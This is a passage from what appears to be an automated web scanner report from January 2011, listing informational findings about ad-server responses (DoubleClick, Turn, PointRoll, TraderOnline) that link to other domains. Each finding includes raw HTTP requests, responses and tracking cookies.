<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/N5_5.99_OrderThisDeal_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;37406893&migRandom=3938818&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

20.2. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5875.270604.B3/B5111946.91

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?

The response contains the following links to other domains:

http://s0.2mdn.net/2356384/2-N7_Specialty_120x600.jpg
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1049
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 01:35:44 GMT
Expires: Tue, 25 Jan 2011 01:35:44 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...
&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.dominos.com/&utm_source=Banner&utm_medium=DPZ_Mbanner&utm_content=NoPromo&utm_campaign=MindshareBanner" target="_blank">
<img width="120" height="600" border="0" src="http://s0.2mdn.net/2356384/2-N7_Specialty_120x600.jpg">
</a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

20.3. http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6061.194450.CDN.TURN.COM/B4419610.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;

The response contains the following link to another domain:

http://s1.2mdn.net/viewad/2703804/1-MMM_468x60.jpg

Request

GET /adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 25 Jan 2011 04:25:33 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 651

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><a target="_blank" href="http://googleads.g.doubleclick.net/aclk?sa=l&ai=BeRbIvVA-TeWrKYmv6Qbr6sm9DAAAAAA
...[SNIP]...
UB2gUCCAA&num=0&sig=AGiWqtwupzlt1zrEqxl3vbbvsaV8fZ1ObQ&client=&adurl=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/http://www.mymms.com/%3Fsrc%3D113266%26sc_cid%3D113266"><img src="http://s1.2mdn.net/viewad/2703804/1-MMM_468x60.jpg" alt="Advertisement" border="0" width="468" height="60"></a>
...[SNIP]...

20.4. http://ad.doubleclick.net/adj/N3753.autotrader.com/B4276010.21 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3753.autotrader.com/B4276010.21

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/N3753.autotrader.com/B4276010.21;sz=300x100;pc=[TPAS_ID];click=http://adserving.autotrader.com/event.ng/Type=click&FlightID=878956&AdID=2109728&TargetID=245135&Targets=259945,259951,259957,259963,259969,259975,259981,229416,235455,238651,245135&Values=307,310,320,325,1168,1626,1638,1686,1720,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19960,34058,35455,36491,36879,37550,39460,39471,40021,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921990&Redirect=;ord=ynsgkn,bgtNmAgetmut?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2552526/CPO+Logo_Used+Cars300x100_borderAdded.jpg

Request

GET /adj/N3753.autotrader.com/B4276010.21;sz=300x100;pc=[TPAS_ID];click=http://adserving.autotrader.com/event.ng/Type=click&FlightID=878956&AdID=2109728&TargetID=245135&Targets=259945,259951,259957,259963,259969,259975,259981,229416,235455,238651,245135&Values=307,310,320,325,1168,1626,1638,1686,1720,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19960,34058,35455,36491,36879,37550,39460,39471,40021,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921990&Redirect=;ord=ynsgkn,bgtNmAgetmut? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/inc/ad.html?Log=0&v=3.17.167500
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 25 Jan 2011 02:19:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 846

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9a/c/1b8/%2a/j;233910587;0-0;0;58839569;3823-300/100;40324746/40342533/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://adserving.
...[SNIP]...
42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921990&Redirect=http%3a%2f%2flexus.com/cpo/%3Fcid%3DCPOZ10NBGENJPG%26cs%3Apro%3Dlt1%26cs%3Aa%3Ae%3Dcpoz10nbgenjpg"><img src="http://s0.2mdn.net/viewad/2552526/CPO+Logo_Used+Cars300x100_borderAdded.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

20.5. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?
http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;
http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;

Request

GET /server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14999%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 04:25:35 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=IwBhXoqWG6cd6LK1Wnmfuw7xUeE2jEhl1LXLCYCWyYXfaqaDzVRu9ZiuBStYaftYsehsFTSmKxz8H_dT-Jl0Dn1PHcIwC2PH259DCE-JXiNlms1EyPDDRa9sja6UxkO0jlMiBdP63qEMyU4eHDk40-q8V4ePnDNpIWo0aHj1LgRvDJHsqYXKmn_CAlmwlDYlAXIue8YWt2dP1w1i6rIdu3iR9sNXakr5gajG_D0roJProc_DPPlbFfwQu1oDDSlmi2JCFUPKc93aEZ1NND-p1qQrupC4PpJl2uCWF8C-Ug7j4wRYKLFggqjCsn1_kL8pjIHdY1J8-8w9PDgWrAYzcfOyBFHryCDMlf-R2G5eCIyjNutLAx_ZaCjc4v3fNB7_VoYS3R2qKw_a47HiysS2Ptmba4Y5H-dc1Uw_QN8A08AWon01KMZJGdnyaU3IkYhpl8vSxIcisdU7_DI6syvRuno3ly0Kwty7GyhLwCaCPRFlbw3kCi5E8RA9R5HEL0TwQkKr1LG0nXzayhve6FCg1-K4j840hUH4soYbPmQ_AR75b5W85bNwz4KaV3P2D8M9TEr74XNNsqzNK-NlDoE2koee6NAFwZUQriKHjx4Pi8lyVtGdZhgjkOg4zjyNGYCDxGxSj2wWaOpITs_JSH4b4_PSRyaSmsOx3lW7T78waIcqXV7j_wp0-1vNUkgqZEX-1Z-OBBuFyn0OKy4G6pkFi7MhnWmekN1sUgWlK4cJ6ZwPl8PHmUPzlA3dCSM7To-CEXwS-6XX7wB6l1yuQyAyNQyqr-I1ILvQtxafsmYbSsGstISe8YznDbRH5otKYhQ1c7hoZnPzMNOkhNZZ-ZQhp0VuruacOi0fS2cp5uhOgCNvUBrICJHG0MnjQ0lTi6GGM302hU7_HqmpQOMIOs94uLT2ikIRW2HI5LDPiT9GU4wphmnhaS5Lbu_6A1w21YanVoYS3R2qKw_a47HiysS2PuMRKxsLZPg9TZ1tzqCyX1wWon01KMZJGdnyaU3IkYhpRRau1rpsTjOMSZYu72kBgFYls0L0hUa4kAoEYLAwYiaK2oyoHzJXoHiDmJnRkYVJTEk9R7kVTBwtrIAWFE2Lc-K4j840hUH4soYbPmQ_AR7zXj5Srs3uOya3rz3JO3P2znwP73OerR98IwLdJfM5ymCpFLJLMKLPcYf5SnIJJ1X6RI9r5uj4vnBp160Ud5xaxGxSj2wWaOpITs_JSH4b42dJUeQ2EvuZijWeQdTIJ3AGO1HG2Mx-sU7H8DziP0hpSscoJJn9hy1KmH4iwQNP7d_WsBU0E-UgFoJDSWMJtyDWIg74Kyudd-aKTtXOZIlNQPO5B3pOq1-XkD73HtsCaIoA8VHGZPaw8KVYCA0sJFaKAPFRxmT2sPClWAgNLCRWXOzXCBxLcPE6Ch7Z7LiZf2G_mSPqr9HXTX3upFEF7TiBXSv_NvKrn7LHnAqX43Rx-4z7rCEzxe9AJkUnSpSWL2FWvensquNi6iS6WJOp0rE; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: fc=_vlP_vna-iwaEgLjXffa4lB9LqX0spbsp94IIPTXQBdRvy6-tKeSzr3CZDTMcZ6x1q-zg9FMZDM2f224XLr3XKafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Set-Cookie: pf=lvGeRa5W-f1SCZ0uXnD5CFrmDV3EiuOqs3FPczWBqpKJwV9kSIzX4BtZ7vBDkFqiOBRlShVAuVmwzPtTfRLP834lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 04:25:35 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:25:35 GMT
Content-Length: 9422

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;" WIDTH=468 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/;">\n</SCRIPT>
...[SNIP]...
<A HREF="http://r.turn.com/r/formclick/id/1TyK6MZ7xS_QzwQAcAABAA/url/http://ad.doubleclick.net/jump/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?">\n<IMG SRC="http://ad.doubleclick.net/ad/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?" BORDER=0 WIDTH=468 HEIGHT=60 ALT="Click Here"></A>
...[SNIP]...

20.6. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=6552283&cch=6553230&code=6554540&l=468x60&aid=25146571&ahcid=357440&bimpd=2wb0RWgXjYhVFhSdaZSvZ32VN1zGKOsk4ov2i8xHVnR0TwY8YE6gjVIS5MJFmkq2godKGQP5jeGRZOKTMN2DPtoklsfmT3ZxopeRfWXKmxbXuJDbTzEKBlvoWg22g08fQBLFzCXvYXkZJOm3FCPXkqPZwd49ogzwkuChi2oAN0q98Yd16mbfryO0v6b7W0VzMU1XDNtmd2fbCqHfl-bOLdphJr3EE0fC3CbZPy6kexTcMSjEcs4aHvsTkHfk60sItyKa63DoHWQFdWQuV51UaADBnZBrweC9c1vHrvKzBN7gz6f2eb9QWGoPXH87ysBrNA8vd4OeqOloKD4KO4hyFxcWjkdAxInVO9Grk85rDkUjqxRYx-TxGCSbMk0dlzlePuFYfd-0Dyn4P3apF4K7-ud30Lg4lLScyp28lK8k26xaeM3yn5dLx8Vmv7-WCyUiK43YnC00-N2rGpetgjUveL3wc-cQ7FRKnITKYzO3zYWcEISZYQ3K7SwVtCGhpriduMjxuTHZaiS7AIkfl75dGEmN4G-1ojp5K2MVoj7ClSFcv5-XUU5q4pXx6xAqrIe7hQsk85fZdNTnuj1_PDPsjnlx4A5fciM2ToJCqG_TCyWkfAEjXqI310WD2Pi5C3XIsFXYlHf7CLGcqzbXuxjA34TYJ7tTV8wwlrv7VDSXEBUy-EKCRGe7mtrcA-OGBKqnBsUx_9Fg59k79MGA4dHXJReht3ivBnz3hwow8XaUE6U&acp=AAABLbrqvaJXoHwA4-uMLkYoHs1YQ_fNzbFTEQ

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?
http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;
http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Thu, 27 Jan 2011 02:05:00 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Set-Cookie: pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Sun, 24-Jul-2011 02:05:00 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 02:05:00 GMT
Content-Length: 9422

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;" WIDTH=468 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie;sz=468x60;ord=3442293584429726933?;click=http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/;">\n</SCRIPT>
...[SNIP]...
<A HREF="http://r.turn.com/r/formclick/id/1TyK6MZ7xS9SpwAAagABAA/url/http://ad.doubleclick.net/jump/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?">\n<IMG SRC="http://ad.doubleclick.net/ad/N6061.194450.CDN.TURN.COM/B4419610.3;abr=!ie4;abr=!ie5;sz=468x60;ord=3442293584429726933?" BORDER=0 WIDTH=468 HEIGHT=60 ALT="Click Here"></A>
...[SNIP]...

20.7. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The page was loaded from a URL containing a query string:

http://ads.pointroll.com/PortalServe/?pid=1149217T71620101123190930&flash=10&time=1|19:35|-6&redir=http://r.turn.com/r/tpclick/id/pNyBDcYPcXUfRwEAbAABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D/url/$CTURL$&pos=s&r=0.4512364394031465

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

Response

20.8. http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156

Issue detail

The page was loaded from a URL containing a query string:

http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156?x

The response contains the following link to another domain:

http://www.snowmobiletraderonline.com/

Request

GET /RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156?x HTTP/1.1
Host: ads.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.1.10.1295884751;

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:29:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.snowmobiletraderonline.com/
Content-Length: 309
